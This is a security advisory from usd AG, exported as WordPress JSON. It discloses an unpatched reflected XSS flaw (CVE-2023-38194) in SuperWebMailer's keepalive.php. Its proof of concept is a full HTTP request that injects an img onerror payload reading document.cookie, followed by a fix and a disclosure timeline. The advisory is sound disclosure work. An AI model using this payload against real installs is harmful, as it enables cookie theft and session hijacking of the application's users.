{"id":21122,"date":"2023-10-20T14:55:51","date_gmt":"2023-10-20T12:55:51","guid":{"rendered":"https:\/\/herolab.usd.de\/?page_id=21122"},"modified":"2023-10-23T09:53:26","modified_gmt":"2023-10-23T07:53:26","slug":"usd-2023-0013","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2023-0013\/","title":{"rendered":"usd-2023-0013"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.21.0\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.22.2\" _module_preset=\"default\" custom_padding=\"||13px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<\/p>\n

usd-2023-0013 | Reflected XSS in SuperWebMailer<\/h1>\n

<\/h1>\n

Advisory ID<\/strong>: usd-2023-013
Product<\/strong>: SuperWebMailer
Affected Version<\/strong>: 9.00.0.01710
Vulnerability Type<\/strong>: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Security Risk<\/strong>: MEDIUM
Vendor URL<\/strong>: https:\/\/www.superwebmailer.de<\/a>
Vendor acknowledged vulnerability<\/strong>: No
Vendor Status<\/strong>: Not fixed
CVE number<\/strong>: CVE-2023-38194
CVE Link<\/strong>: Pending<\/p>\n

Desciption<\/h3>\n

SuperWebMailer is an online application for managing e-mail newsletters.
An unauthenticated Cross-Site Scripting (XSS) vulnerability was discovered during an engagement.
In an XSS attack, a potentially malicious script is injected into a website.<\/p>\n

The keepalive.php<\/strong> script is vulnerable to reflected XSS payloads.
The script outputs a caller<\/strong> GET parameter inside the HTML with insufficient encoding or filtering being applied.
Consequently, on submitting an XSS payload, it is executed.<\/p>\n

Proof of Concept<\/h3>\n

The following request includes JavaScript in the caller<\/strong> parameter:<\/p>\n

\n
<\/span>GET<\/span> \/keepalive.php?caller=\"><img+src%3d1+onerror%3dalert(document.cookie)+\/>&uq_mt=1664137650.085<\/span> HTTP<\/span>\/<\/span>2<\/span>\nHost<\/span>:<\/span> swm.example.com<\/span>\nCookie<\/span>:<\/span> PHPSESSID=8k8n7rmlnugo73d3jjtaeantft; SuperWebMailer=161kd4lr0kv8qplkknm927u0cs; smlswmCsrfToken=20mqIe2UqIA2ya6ImiqaYM2Q6EuYy6y6ya2QUa<\/span>\nUser-Agent<\/span>:<\/span> Mozilla\/5.0 (X11; Linux x86_64; rv:102.0) Gecko\/20100101 Firefox\/102.0<\/span>\nAccept<\/span>:<\/span> text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8<\/span>\nAccept-Language<\/span>:<\/span> en-US,en;q=0.5<\/span>\nAccept-Encoding<\/span>:<\/span> gzip, deflate<\/span>\n<\/pre>\n<\/div>\n
As the following screenshot indicates, the above JavaScript is embedded within the application and executed:
\"Browser<\/p>\n
Fix<\/h3>\n
It is recommended to treat all input on the website as potentially dangerous. Hence, all output that is dynamically generated based on user-controlled data should be encoded according to its context.<\/p>\n
References<\/h3>\n
https:\/\/cwe.mitre.org\/data\/definitions\/79.html<\/a>
https:\/\/owasp.org\/www-community\/attacks\/xss\/<\/p>\n
Timeline<\/h3>\n
    \n
  • 2022-09-26<\/strong>: This vulnerability was discovered by Florian Dewald and Gerbert Roitburd of usd AG.<\/li>\n
  • 2023-04-20<\/strong>: First contact request via info@superwebmailer.de.<\/li>\n
  • 2023-05-08<\/strong>: Reminder sent via info@superwebmailer.de and contact form.<\/li>\n
  • 2023-05-15<\/strong>: Second reminder to webmaster@wt-rate.com and info@superwebmailer.de.<\/li>\n
  • 2023-05-25<\/strong>: Another reminder sent to info@superwebmailer.de, webmaster@wt-rate.com and info@wt-rate.com<\/li>\n
  • 2023-06-05<\/strong>: Once more tried to inform the company of the vulnerabilities via the feedback form (info@superwebmailer.de).<\/li>\n
  • 2023-07-17<\/strong>: Sent another email to info@supermailer.de, webmaster@wt-rate.com, info@wt-rate.com and info@superwebmailer.de, stressing that CVEs are assigned to the vulnerabilities and disclosure may happen in case we do not receive an answer soon.<\/li>\n
  • 2023-08-17<\/strong>: As the vulnerabilities were found during a pentest, the customer was asked whether or not the Responsible Disclosure Team should move forward without the software vendor's cooperation.<\/li>\n
  • 2023-10-02<\/strong>: Final notice given to info@superwebmailer, warning of immenent disclosure should there be no response within a week.<\/li>\n
  • 2023-10-20<\/strong>: Vulnerabilities disclosed by usd AG.<\/li>\n<\/ul>\n
    Credits<\/h3>\n
    This security vulnerability was identified by Florian Dewald and Gerbert Roitburd of usd AG.<\/p>\n
    [\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"
    usd-2023-0013 | Reflected XSS in SuperWebMailer Advisory ID: usd-2023-013Product: SuperWebMailerAffected Version: 9.00.0.01710Vulnerability Type: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')Security Risk: MEDIUMVendor URL: https:\/\/www.superwebmailer.deVendor acknowledged vulnerability: NoVendor Status: Not fixedCVE number: CVE-2023-38194CVE Link: Pending Desciption SuperWebMailer is an online application for managing e-mail newsletters.An unauthenticated Cross-Site Scripting (XSS) vulnerability was discovered […]<\/p>\n","protected":false},"author":114,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-21122","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/21122","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/114"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=21122"}],"version-history":[{"count":5,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/21122\/revisions"}],"predecessor-version":[{"id":21186,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/21122\/revisions\/21186"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=21122"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}